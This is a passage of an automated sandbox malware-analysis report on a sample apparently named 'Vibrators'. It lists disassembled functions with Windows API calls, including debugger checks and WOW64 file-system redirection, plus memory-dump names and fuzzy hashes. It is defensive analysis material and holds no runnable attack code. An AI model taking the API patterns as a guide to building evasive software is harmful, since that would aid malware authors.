Instruction ID: 3131655e0836ae6ec3b33e0e19316946c23ca4b702a67672a9bb39bfce22fc2c
Opcode Fuzzy Hash: 5a964c93cc86075c191f8bd12d0ed3baa276da0119f83a41151f124d6a8a8ec3
Instruction Fuzzy Hash: 6FF082352043489BEB30CBE0DC49FEA73ACEF84310F104929E219D30D0DB749588DB25

Function 009FCAB0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009FCEEE

Strings

p6, xrefs: 009FCE12, 009FCF0B, 00A41615, 00A41629

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Init_thread_footer
String ID: p6
API String ID: 1385522511-2659408500
Opcode ID: 72e982bb070b5d1ffe103c395c4e66f85cd48e0c6928c2fe5536962e9190adee
Instruction ID: 21dff5c8b049347bdbaaace7ff2bc5ec0d78b7ea2175fdb28b0b3c4d2348806e
Opcode Fuzzy Hash: 72e982bb070b5d1ffe103c395c4e66f85cd48e0c6928c2fe5536962e9190adee
Instruction Fuzzy Hash: 5432AFB9A0020D9FDB10CF54CA84EBEB7B9EF84314F15C459EA16AB291C734ED81CB91

Function 00A02B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A03006

Strings

CALL, xrefs: 00A02FD6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 28af983cc62567454db74e213bea970ff900ca28874c22f7ae426b87fb0f0d59
Instruction ID: 8396e939ca565537e303780875c7dd6515a4c604a8a20d30da1daf9c58eacdc7
Opcode Fuzzy Hash: 28af983cc62567454db74e213bea970ff900ca28874c22f7ae426b87fb0f0d59
Instruction Fuzzy Hash: 4B229A74608345DFDB14DF24D884B2ABBF1BF88314F24895DF58A8B2A1D772E981CB42

Function 00A01990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5f811465ba8a35d44a4231798ff738f905ba7454b6c8bb3c3f722379ee0111
Instruction ID: fdfc190796e01b1d7710ef4fa67848a736f96c3ad66bd4b8325ba945bd155ad4
Opcode Fuzzy Hash: 5f5f811465ba8a35d44a4231798ff738f905ba7454b6c8bb3c3f722379ee0111
Instruction Fuzzy Hash: D432DF74A00219EFCB20EF54D881BEEB7B4FF46314F148559E915AB291EB71ED80CB92

Function 009F3A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00A3413B

Part of subcall function 009F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F55D1,?,?,00A34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 009F5871

Part of subcall function 009F3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009F3A76

Strings

X, xrefs: 00A34109

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: e2cfff8575b95ab45aae74fafa2f8eac05e475e02bad7d7c498f71e5ea1bf632
Instruction ID: 527c92064e203046c324567298ceb622f9ab70ccf11617d6e20b9d5cbe78893c
Opcode Fuzzy Hash: e2cfff8575b95ab45aae74fafa2f8eac05e475e02bad7d7c498f71e5ea1bf632
Instruction Fuzzy Hash: 13219371A0025C9BCB01DF98CC05BEE7BFCAF89314F008059E645B7281DBF89A898F61

Function 009F396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 009F3A3C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 1a60471dadd9abce0d6880769b5acb5f75e4f50fa7aae7d838577c53fa240773
Instruction ID: 9cbbcf251eedfbc49643cac2516a1624ef9c5121ce9f68fac0e2456a3f584c6c
Opcode Fuzzy Hash: 1a60471dadd9abce0d6880769b5acb5f75e4f50fa7aae7d838577c53fa240773
Instruction Fuzzy Hash: 89318470604705CFD320DF65D884BA7BBE8FB49318F00092EE6D987341D7B5A944CB52

Function 009F331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 009F333D

Part of subcall function 009F32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009F32FB
Part of subcall function 009F32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009F3312

Part of subcall function 009F338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,009F3368,?), ref: 009F33BB
Part of subcall function 009F338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,009F3368,?), ref: 009F33CE
Part of subcall function 009F338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AC2418,00AC2400,?,?,?,?,?,?,009F3368,?), ref: 009F343A
Part of subcall function 009F338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00AC2418,?,?,?,?,?,?,?,009F3368,?), ref: 009F34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 009F3377

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 4779f06b9ff75a6b8070b91d2923aa56ca5a734a1a96aa6240dd444fd736a24c
Instruction ID: a7f073b2276cff4bb9438261f043eb2ab5b11df00e20744c595f3bb1833f7418
Opcode Fuzzy Hash: 4779f06b9ff75a6b8070b91d2923aa56ca5a734a1a96aa6240dd444fd736a24c
Instruction Fuzzy Hash: A8F054729543889FDB01EFF0ED0EF743794A744709F418916BA054E2E2CBBE41528B40

Function 00A0FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00A1007D
Sleep.KERNEL32 ref: 00A1008F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 8d44b1212e8cbf013e0d883dcb8f6aa82efa902932ac3bfd226fab8a7a9fc8c9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9D31D274A00105DFC718DF58D480EA9FBB6FB59300B2886A5E44ACB656D7B2EDC1CBC0

Function 00A77AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 4ba34182aab927dc25f21f2b20c84b2df4d0e10b19f4b6183630a63f0b5e9753
Instruction ID: 7d1c8671b5a16cd342cd3fa202051607e83448031c3f0decff9619d60b24ccc8
Opcode Fuzzy Hash: 4ba34182aab927dc25f21f2b20c84b2df4d0e10b19f4b6183630a63f0b5e9753
Instruction Fuzzy Hash: 47D13B75A04209EFCB14EF98D8819FEBBB5FF48310F148159E919AB291DB30AE51CF90

Function 00A1F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa712a1d7a57cdcdf36f62850fbaaddb6f2b4f2a1143d1c9f7e90e145442afd
Instruction ID: 684845036c6588f7c27670538467ca4f81311e068c2c0d5e6af44f21892a2067
Opcode Fuzzy Hash: 0fa712a1d7a57cdcdf36f62850fbaaddb6f2b4f2a1143d1c9f7e90e145442afd
Instruction Fuzzy Hash: 8251CB75A00198AFDB10DF68C841FE97BB6EF85364F198178E8189B391D771ED82CB90

Function 00A5FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A5FCCE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 126a0edf9f80358f817586c00d0e812ef1731deaa426448a81f9ffbabf8cc840
Instruction ID: 993fad97814fb3cf3cac3a599157bb0589c19eca387261fd928cf7a6acb26eb4
Opcode Fuzzy Hash: 126a0edf9f80358f817586c00d0e812ef1731deaa426448a81f9ffbabf8cc840
Instruction Fuzzy Hash: 1E41A4B7500209AFCB11EF68C8819AEB7B9FF44315B10453EEA5697251EB70DE49CB50

Function 009F6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009F663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009F668B,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F664A
Part of subcall function 009F663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009F665C
Part of subcall function 009F663E: FreeLibrary.KERNEL32(00000000,?,?,009F668B,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F66AB

Part of subcall function 009F6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A35657,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F6610
Part of subcall function 009F6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009F6622
Part of subcall function 009F6607: FreeLibrary.KERNEL32(00000000,?,?,00A35657,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F6635

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 8ce1a973b4fab675e741e1c8339fbf43296097ed39ba3ad5612e0e8701e4f926
Instruction ID: 726d15b1c8f92ce523b3dc44613ab5d8cea2f10f381940164818a4b5633260da
Opcode Fuzzy Hash: 8ce1a973b4fab675e741e1c8339fbf43296097ed39ba3ad5612e0e8701e4f926
Instruction Fuzzy Hash: CB11E372600309AACF14BB74C903BBD7BA5AF90710F20482DF682E61C2EF75DA059B54

Function 00A28782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00A287C0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 13f2619da33150a858d94c81e27fb8a956ed39024c5edca26461914381fc4206
Instruction ID: ee45de0a397d99dc2030278d3a8202569063acfdcf315539e1eebe7f1008b83a
Opcode Fuzzy Hash: 13f2619da33150a858d94c81e27fb8a956ed39024c5edca26461914381fc4206
Instruction Fuzzy Hash: 3D112A7590410AAFCF05DF98E945D9E7BF4EF48310F114069F809AB311DA31EE21CBA5

Function 00A25373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A24FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A25031

_free.LIBCMT ref: 00A253DF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: e1585ead9307651d1fa12c7a132dd9fe7e376ce302cae549434b9ced50f81718
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 8B0126726003146BE731CF6DE881A5AFBE9FB85370F65052DE58487280EA70A8058B64

Function 00A1E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: d06d31ab97a0c626e6c7bebb91631292ad9f7259caf6f9f26557095f17fb386c
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 1CF0F4325016205AD6317A3EAD01BDA76989F42330F100B26FD22D71D1EA74E88286D2

Function 009FB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009FB333

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
Instruction ID: 33c875fc018a8f04289333fe02f62387cdecdac6f00211ebe4afc393a0d1eed0
Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
Instruction Fuzzy Hash: C3F0C8B36417047ED7149F28D806FA6BB98EB44360F10862AFB19CB1D1DB75E5508BE0

Function 00A6F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A6F987

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 5c6f0f1f4d087c67be1322d8adef8a02917c10603b01d170d94266dea56cae05
Instruction ID: cefc8307077fc5e5611a29f6e7b5773e8b32271e647051d277446706bbbd6018
Opcode Fuzzy Hash: 5c6f0f1f4d087c67be1322d8adef8a02917c10603b01d170d94266dea56cae05
Instruction Fuzzy Hash: 7DF03176600204BFCB01EBA5DD46EDF7BB8EF85720F004055F5059B261DA74A981C751

Function 00A24FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A25031

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 047896e6bab3a74c7e1cbd1ec4cb70595ffdc3eb869fda6afa55d83b7626d72c
Instruction ID: 82dfdc241503f715adc363cd8f92cec4059682d1a6ef7a21da0296b6e6cfddc9
Opcode Fuzzy Hash: 047896e6bab3a74c7e1cbd1ec4cb70595ffdc3eb869fda6afa55d83b7626d72c
Instruction Fuzzy Hash: CAF0BE32E18E30AE9B316B7AEC05F9A3758BF807B0F158031B814DB190EA30D80186E0

Function 00A23B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00A16A79,?,0000015D,?,?,?,?,00A185B0,000000FF,00000000,?,?), ref: 00A23BC5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2147a112a1ea3e1d258d00bde18a94a5fa0eaa982201a4f3438bb27a211ee141
Instruction ID: bf067535f231cbbf4c8b3c6bdc43063efebf6337a67106a1ab8f7b8afac6c806
Opcode Fuzzy Hash: 2147a112a1ea3e1d258d00bde18a94a5fa0eaa982201a4f3438bb27a211ee141
Instruction Fuzzy Hash: F8E0ED33600634A6DE203FBABC01F9A3A59AF437A0F150170EC159A190DF38CE8282E0

Function 009F66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da235195c61eb84b93dad113f01942bade5b29d048543eec5704ff329c0b0ce2
Instruction ID: 689c410c747cd17cf51394e17733ff75c335d2bb2b1846389447366f93e1201c
